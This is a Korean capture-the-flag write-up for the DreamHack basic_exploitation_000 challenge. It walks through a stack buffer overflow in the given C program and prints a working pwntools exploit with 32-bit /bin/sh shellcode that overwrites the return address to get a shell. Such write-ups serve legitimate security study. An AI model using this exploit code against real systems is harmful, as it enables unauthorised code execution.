DreamHack - basic_exploitation

728x90

basic_exploitation_000.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    printf("buf = (%p)\n", buf);
    scanf("%141s", buf);

    return 0;
}

사용자로부터 141 바이트 크기의 문자열을 입력받고 있지만 입력이 저장되는 버퍼의 사이즈는 0x80(128 바이트) 밖에 되지 않는다. 즉 버퍼 오버플로우 취약점이 존재한다는 의미다.

게다가 프린트 출력으로 buf의 시작 주소를 대놓고 알려주니 return 시에 buf의 시작 주소로 가서 내가 작성한 임의 코드 실행을 하는 것이 목적이다.

파일 보호 기법 확인(checksec)

STACK CANARY가 활성화하지 않은 것으로 보아 Return Address Overwrite가 가능하며, NX 보호 기법도 비활성화된 것을 보면 임의 코드 실행이 가능한 실행 파일이다.

NX-Bit ( Never eXecute Bit , 실행 방지 비트 )란?
프로세스 명령어나 코드 또는 데이터 저장을 위한 메모리 영역을 따로 분리하는 CPU의 기술
NX특성으로 지정된 모든 메모리 구역은 데이터 저장을 위해서만 사용되며, 프로세스 명령어가 그곳에 상주하지 않음으로써 실행되지 않도록 만들어 준다.

출처:

https://c0wb3ll.tistory.com/entry/%EB%A9%94%EB%AA%A8%EB%A6%AC-%EB%B3%B4%ED%98%B8-%EA%B8%B0%EB%B2%95-NX-Bit

메모리 보호 기법 (NX-Bit)

메모리 보호 기법 ( NX-Bit ) 메모리 보호 기법 종류 NX Bit ( MS : DEP ) ASLR Canaries RELRO PIE NX-Bit ( MS : DEP )? NX-Bit ( Never eXecute Bit , 실행 방지 비트 )란? 프로세스 명령어나 코드 또는 데이터 저장을 위한

c0wb3ll.tistory.com

exploit.py

from pwn import *

sh = process("./basic_exploitation_000")
# sh = remote("host3.dreamhack.games", 11834)

sh.recvuntil("(")
addr = int( sh.recvline().decode().split(')')[0], 16 )

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
payload = shellcode
payload += b"b" * ( 128 + 4 - len(shellcode) )
payload +=  p32(addr)

sh.sendline(payload)

sh.interactive()

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"는 어셈블리로 작성된 32비트 환경 쉘코드이다.

payload += b"b" * ( 128 + 4 - len(shellcode) )

payload 변수에 버퍼를 채우기 위해 임의의 값인 "b"를 128 + 4 - len(shellcode) 만큼 채워 넣었다.

여기서 128은 buf의 크기를 의미하며, 4는 SFP를 의미한다.

payload += p32(addr)

마지막에는 buf의 시작 주소를 32비트 형태 리틀 엔디언으로 패킹한 다음 페이로드에 포함해 준다.

시스템 쉘 획득

작성을 한 파이썬 코드를 실행시키면 알아서 페이로드를 전송해 인터렉티브 모드로 바뀌면서 공격 대상의 쉘을 획득에 성공한다.

728x90

'🏴CTF > DreamHack' 카테고리의 다른 글

DreamHack - Quiz: x86 Assembly 1 (0)	2023.05.01
DreamHack - Return Address Overwrite (0)	2023.04.30
DreamHack - basic_exploitation_001 풀이 (0)	2023.04.25
DreamHack - login-1 풀이 (0)	2023.03.27
DreamHack - node-serialize (nodejs 직렬화 취약점) 풀이 (0)	2023.03.27

HackLog

DreamHack - basic_exploitation_000 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

티스토리툴바

DreamHack - basic_exploitation_000 풀이

'🏴CTF > DreamHack' 카테고리의 다른 글

관련글

티스토리툴바